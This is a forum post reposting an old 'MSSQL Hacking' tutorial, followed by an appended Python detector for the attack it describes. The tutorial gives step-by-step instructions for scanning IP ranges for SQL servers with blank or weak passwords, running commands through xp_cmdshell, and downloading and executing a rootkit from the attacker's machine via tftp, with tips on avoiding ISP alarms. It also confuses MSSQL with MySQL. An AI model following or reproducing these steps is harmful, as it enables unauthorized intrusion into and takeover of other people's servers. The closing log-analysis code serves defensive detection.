Administrator
Join Date: Dec 2007
Original post: EliteHackerz.net MYSQL Hacking Tutorial
Code:
MSSQL Hacking
MSSQL Hacking by wtfmates - 26-05-2005
wtfm4tes [at] gmail.com
=========================

I'm going to try to keep this tutorial as simple as possible. This tutorial will tell you how to find and exploit MSSQL servers.

You will need:
SQLExec (Google it, there's a few versions, the NetHackerIII version or the Green Apple ones will suffice)
A Portscanner (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
HSCAN v1.20 (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
TFTPD32 (h!!p://tftpd32.jounin.net/)

Ok, I'll cover two ways to find MSSQL servers. Well... it's actually one way, just performed in slightly different ways.

First Method (Range Method):
Basically just load up HScan v1.20 (hscan_gui.exe) and go Menu -> Modules and uncheck everything except 'Check hostname of target' and 'Check MSSQL weak accounts'. Now under Menu -> Parameters just enter a Start IP and an End IP, and adjust Max Threads/Host to whatever you're comfortable with; when scanning from home I use 20 Threads and 5 Hosts. If scanning from a ScanStro (more on this later) I use anywhere from 25 to 50 threads and anywhere from 10 to 20 hosts. I leave the Timeout and SleepTime at default and also leave 'Ping host before scan' checked. Once you have this all set accordingly click OK and now click Menu -> Start to start whoring whatever range you selected.

What this will do is Ping -> Check TCP 1433 -> Resolve hostname -> Attempt to crack MSSQL accounts

To do this remotely from a scanstro using the normal hscan CLI simply send a raw:
SITE EXEC hide.exe hscan.exe -h 192.168.0.1 192.168.0.254 -report -name -mssql -max 30,10

Second Method (List Method):
This is pretty much the exact same as the range method; you're using a host list instead of whoring a range. I prefer this method as it tends to attract less attention and won't set off as many alarms at your ISP. Basically in Parameters in hscan_gui just check off 'Hosts List' and open a list of IPs with MSSQL servers running on them. To get such a list you can usually check your fav boards, or I'm sure there are some scanners out there that have good enough logging options that can do it for you as well. Also using your scanstro to portscan would suffice as well.

To perform a host-list-based MSSQL scan from a scanstro simply send a raw like this:
SITE EXEC hide.exe hscan.exe -f hosts.txt -report -name -mssql -max 30,10

Exploiting:
Anywh0re, after the aforementioned scans are finished you should hopefully have some cracked accounts to play with. The scan results generated by hscan are in HTML format and look a little something like this:
-----------------------------------------
192.168.0.151 (p1336.omgwtfhax.info)
192.168.0.152 (p1337.omgwtfhax.info)
[MYSQL SCAN]
Version: 4.1.8
Cracked account: root/[null]
192.168.0.153 (p1338.omgwtfhax.info)
-----------------------------------------

From what I can tell the 'NetHackerIII' version of sqlexec.exe is easier to find than the Green Apple one, so I'll use that one in my examples. (MS-SQL Exec for NetHackerIII Version 1.0.0.0)

Open sqlexec.exe and you'll be prompted with some ghey screen (TianXing Free Registration Center). Just click Later. Now this screen should be pretty self-explanatory. In this case we would put 192.168.0.152 in the Host box and "root" without quotes in Username, and Password is just left blank ([null] == nothing derr). Hit Connect, and for a test command I use 'ver' instead of 'dir c:\' so my output looks a little something like this:
-----------------------------------------
MS-SQL Exec for NetHackerIII Version 1.0.0.0
Copyright © TianXing Software Kingdom 1999-2001.
Programmed by ChenWeishan 2001.2
WEB: h!!p://www.tianxing.org , h!!p://www.softkingdom.net
Email: tianxing [at] 163.net
ICQ: 13101363 , OICQ: 911189
SQL>Connecting 192.168.0.152.
SQL>Connected to 192.168.0.152.
SQL>Command: xp_cmdshell "ver"
Mcft Windows 2000 [Versão 5.00.2195]
Mcft Windows 2000 [Versão 5.00.2195]
-----------------------------------------

This is where TFTPD32 comes in. Run tftpd32.exe and make sure you set the 'Server interface' to your real IP and not your LAN one, should it show up in the list. Now you can upload your favorite rootkit or scanstro to this box in the following fashion; send the command:
tftp -i 1.3.3.7 get rootkit.exe C:\winnt\system32\rootkit.exe
Where 1.3.3.7 is your IP. Now send:
start C:\winnt\system32\rootkit.exe
That should execute the rootkit on the box, and you can now close sqlexec and should now have access via whatever means your rootkit provides.

Happy rooting!
-wtfmates
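Added example, not part of the post above: the defender's view of the xp_cmdshell -> tftp -> start chain the tutorial walks through. It parses SQL Server statement-audit lines in a hypothetical "date time login@client-ip statement" format (the sample lines are constructed, not from the post), flags any xp_cmdshell use, and escalates to critical when the same login@host is seen pulling a file onto the server and then launching it.

```python
import re
from dataclasses import dataclass

# Constructed sample audit lines (hypothetical "<date> <time> <login>@<client-ip> <statement>"
# format, not taken from the post); the sa@203.0.113.7 lines mirror the post's command chain.
SAMPLE_AUDIT = r"""2005-05-26 10:01:02 app_user@10.0.0.5 SELECT name FROM sys.tables
2005-05-26 10:01:09 sa@203.0.113.7 EXEC xp_cmdshell 'ver'
2005-05-26 10:01:15 sa@203.0.113.7 EXEC xp_cmdshell 'tftp -i 203.0.113.9 get rootkit.exe C:\winnt\system32\rootkit.exe'
2005-05-26 10:01:20 sa@203.0.113.7 EXEC xp_cmdshell 'start C:\winnt\system32\rootkit.exe'
2005-05-26 10:02:00 report_user@10.0.0.8 SELECT COUNT(*) FROM orders
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<login>[^@\s]+)@(?P<host>\S+) (?P<stmt>.*)$")
CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)
TFTP_GET_RE = re.compile(r"\btftp\b[^']*\bget\b", re.IGNORECASE)    # file pulled onto the server
START_EXE_RE = re.compile(r"\bstart\b\s+\S+\.exe\b", re.IGNORECASE)  # dropped binary launched

@dataclass
class Alert:
    login: str
    host: str
    tag: str        # "cmdshell", "download" or "launch"
    severity: str   # "medium", "high" or "critical"
    statement: str

def classify(stmt):
    """Return (tag, severity) for one statement, or None when xp_cmdshell is not involved."""
    if not CMDSHELL_RE.search(stmt):
        return None
    if TFTP_GET_RE.search(stmt):
        return "download", "high"
    if START_EXE_RE.search(stmt):
        return "launch", "high"
    return "cmdshell", "medium"   # any use is worth a look; the proc should be disabled via sp_configure

def analyze(audit_text):
    """Parse audit lines, flag xp_cmdshell use, escalate a download-then-launch pair from one login@host."""
    alerts = []
    for line in audit_text.splitlines():
        m = LINE_RE.match(line)
        verdict = classify(m["stmt"]) if m else None
        if verdict:
            alerts.append(Alert(m["login"], m["host"], verdict[0], verdict[1], m["stmt"]))
    downloaders = {(a.login, a.host) for a in alerts if a.tag == "download"}
    for a in alerts:
        if a.tag == "launch" and (a.login, a.host) in downloaders:
            a.severity = "critical"   # full chain observed: file pulled in, then executed
    return alerts

if __name__ == "__main__":
    for a in analyze(SAMPLE_AUDIT):
        print(f"[{a.severity:8}] {a.login}@{a.host}: {a.statement}")
```

The same checks apply to real SQL Server Audit or trace output once LINE_RE is adjusted to its layout; the lasting fix is disabling xp_cmdshell with sp_configure and removing blank-password logins like the root/[null] account the scan report shows.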
Design By: Miner Skinz.com
Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios